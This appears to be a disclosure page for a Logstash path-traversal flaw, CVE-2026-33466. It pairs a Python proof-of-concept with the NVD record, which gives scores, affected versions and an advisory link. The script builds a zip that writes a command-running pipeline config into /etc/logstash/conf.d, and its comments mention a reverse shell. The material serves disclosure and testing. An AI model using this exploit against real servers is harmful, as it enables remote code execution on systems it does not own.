CVE-2026-33466

import zipfile import os # Create a zip file containing a path traversal payload # This simulates the malicious archive sent to Logstash zip_filename = "malicious_archive.zip" # Malicious Logstash pipeline configuration to achieve RCE # This config executes a shell command (e.g., creating a file or reverse shell) payload_content = """ input { exec { command => "touch /tmp/pwned_by_logstash" interval => 0 } } output { stdout {} } """ with zipfile.ZipFile(zip_filename, 'w') as zf: # Construct a filename with path traversal sequences # This attempts to write outside the intended extraction directory # Assuming Logstash reloads configs from /etc/logstash/conf.d/ zinfo = zipfile.ZipInfo("../../etc/logstash/conf.d/malicious_pipeline.conf") zinfo.compress_type = zipfile.ZIP_DEFLATED zf.writestr(zinfo, payload_content) print(f"[+] Created malicious archive: {zip_filename}") print("[+] Upload this to the vulnerable Logstash update endpoint.") print("[+] If automatic pipeline reload is enabled, RCE will be triggered.")

{"cve": {"id": "CVE-2026-33466", "sourceIdentifier": "[email protected]", "published": "2026-04-08T18:26:00.557", "lastModified": "2026-04-21T23:14:06.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or attacker-controlled update endpoint can write arbitrary files to the host filesystem with the privileges of the Logstash process. In certain configurations where automatic pipeline reloading is enabled, this can be escalated to remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:logstash:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.14", "matchCriteriaId": "55DBE8FA-7310-4495-974D-98C32189B038"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:logstash:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.2.8", "matchCriteriaId": "00CAA64C-2749-427D-B403-5A42B6ABBB1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:logstash:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.3", "matchCriteriaId": "55ADA858-5D32-4C8A-865B-BD386A9615B7"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29/385816", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}